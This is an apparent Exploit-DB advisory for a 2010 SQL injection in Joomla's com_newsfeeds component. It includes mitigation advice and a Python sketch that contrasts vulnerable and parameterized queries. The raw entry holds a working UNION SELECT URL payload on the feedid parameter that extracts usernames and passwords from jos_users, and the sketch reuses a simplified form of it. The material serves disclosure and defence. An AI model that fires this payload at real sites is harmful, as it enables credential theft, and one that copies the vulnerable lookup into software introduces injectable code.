Vendor: N/A
Author: Archimonde
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Joomla Component com_newsfeeds SQL injection vulnerability

The vulnerability exists in the Joomla component com_newsfeeds, which allows an attacker to inject arbitrary SQL commands. By manipulating the 'feedid' parameter in the 'index.php' file, an attacker can inject malicious SQL commands. An example of this is shown in the exploit code, where the attacker can inject a 'UNION SELECT' statement to retrieve the username and password of the Joomla users.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries. Additionally, it is recommended to use parameterized queries instead of dynamic SQL queries to prevent SQL injection attacks.
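As an added illustration of the mitigation above (example code, not code from this advisory or from Joomla itself), the following Python/sqlite3 sketch contrasts a feed lookup that pastes the `feedid` request parameter into the SQL string with one that validates it as an integer and binds it as a query parameter. The table `jos_newsfeeds`, its rows and the `jos_users` row are constructed stand-ins for the Joomla tables the advisory refers to.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the two Joomla tables involved:
# the feed table queried by feedid and jos_users, which the advisory's
# UNION payload targets. Names and rows are illustrative only.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE jos_newsfeeds (id INTEGER PRIMARY KEY, name TEXT, link TEXT);
        CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO jos_newsfeeds VALUES (5, 'Security feed', 'http://feeds.example/rss');
        INSERT INTO jos_users VALUES (62, 'admin', 'HASH_PLACEHOLDER');
    """)
    return conn

def lookup_feed_vulnerable(conn: sqlite3.Connection, feedid: str) -> list:
    # Dynamic SQL: the raw request parameter becomes part of the statement,
    # so a crafted feedid rewrites the query instead of selecting one row.
    sql = f"SELECT id, name, link FROM jos_newsfeeds WHERE id = {feedid}"
    return conn.execute(sql).fetchall()

def is_valid_feedid(feedid: str) -> bool:
    # A feed id is a row id: accept only a short run of decimal digits.
    return re.fullmatch(r"[0-9]{1,10}", feedid) is not None

def lookup_feed_safe(conn: sqlite3.Connection, feedid: str) -> list:
    # Validate first, then bind the value as a parameter so the driver
    # treats it as data and never parses it as SQL.
    if not is_valid_feedid(feedid):
        raise ValueError("feedid must be a positive integer")
    sql = "SELECT id, name, link FROM jos_newsfeeds WHERE id = ?"
    return conn.execute(sql, (int(feedid),)).fetchall()

if __name__ == "__main__":
    db = build_db()
    # Constructed three-column simplification of the advisory's UNION payload.
    crafted = "-1 UNION SELECT id, username, password FROM jos_users--"
    print("vulnerable lookup returns:", lookup_feed_vulnerable(db, crafted))
    print("safe lookup, legitimate id:", lookup_feed_safe(db, "5"))
    print("safe lookup rejects payload:", not is_valid_feedid(crafted))
```

The vulnerable lookup returns a `jos_users` row for the crafted value, while the safe lookup rejects it before any SQL runs and still serves an ordinary integer id.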
Source

Exploit-DB raw data:

# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
# Date: 30/04/2010
# Author: Archimonde
# Software Link:
# Version:
# Tested on:
# CVE :
# Code :

Email : archimondera@gmail.com
Website : xgroupvn.org - programmer.vn

index.php?option=com_newsfeeds&view=categories&feedid=[sqli]

Example:

http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--